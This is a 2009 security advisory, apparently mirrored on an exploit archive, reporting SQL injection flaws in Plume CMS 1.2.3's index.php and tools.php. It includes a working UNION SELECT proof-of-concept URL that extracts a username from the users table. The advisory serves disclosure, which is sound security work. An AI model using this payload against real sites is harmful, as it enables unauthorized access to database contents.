477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
87 lines
2.4 KiB
Text
Executable file
87 lines
2.4 KiB
Text
Executable file
Plume CMS Multiple SQL Injection Vulnerabilities - Security Advisory -
|
|
SOS-09-006
|
|
|
|
|
|
Release Date. 12-Aug-2009
|
|
Last Update. -
|
|
Vendor Notification Date. 16-Jun-2009
|
|
Product. Plume CMS
|
|
Platform. Independent
|
|
Affected versions. 1.2.3 (verified), possibly others
|
|
Severity Rating. High
|
|
Impact. Manipulation of data
|
|
Attack Vector. Remote with authentication
|
|
Solution Status. Unpatched
|
|
CVE reference. Not yet allocated
|
|
|
|
|
|
|
|
Details.
|
|
|
|
Plume CMS is a content management system written in PHP. The application
|
|
suffers from SQL injection vulnerabilities in index.php and tools.php, as it
|
|
fails to validate data supplied in the "m" variable of index.php before
|
|
being used in a SQL query. Additionally, the variable "id" of tools.php is
|
|
also vulnerable to the same type of attack.
|
|
|
|
SQL injection attacks can give an attacker access to backend database
|
|
contents, the ability to remotely execute system commands, or in some
|
|
circumstances the means to take control of the operating system hosting the
|
|
database.
|
|
|
|
|
|
|
|
Proof of Concept.
|
|
|
|
The below POC will return the first username from the users table:
|
|
/plume/manager/index.php?m=1 UNION SELECT
|
|
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,user_username,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
|
|
FROM plume_users LIMIT 1,1--
|
|
|
|
|
|
|
|
Solution.
|
|
|
|
None.
|
|
|
|
|
|
|
|
Discovered by.
|
|
|
|
SOS Labs.
|
|
|
|
|
|
|
|
About us.
|
|
|
|
Sense of Security is a leading provider of information security and risk
|
|
management solutions. Our team has expert skills in assessment and
|
|
assurance, strategy and architecture, and deployment through to ongoing
|
|
management. We are Australia's premier penetration testing company and
|
|
trusted IT security advisor to many of the countries largest organisations.
|
|
|
|
Sense of Security Pty Ltd
|
|
|
|
Level 3, 66 King St
|
|
Sydney NSW 2000
|
|
AUSTRALIA
|
|
|
|
|
|
T: +61 (0)2 9290 4444
|
|
F: +61 (0)2 9290 4455
|
|
W: http://www.senseofsecurity.com.au
|
|
E: info@senseofsecurity.com.au
|
|
|
|
|
|
|
|
The latest version of this advisory can be found at:
|
|
|
|
http://www.senseofsecurity.com.au/advisories/SOS-09-006.pdf
|
|
|
|
|
|
|
|
Other Sense of Security advisories can be found at:
|
|
|
|
http://www.senseofsecurity.com.au/research/it-security-advisories.php
|
|
|
|
# milw0rm.com [2009-08-12]
|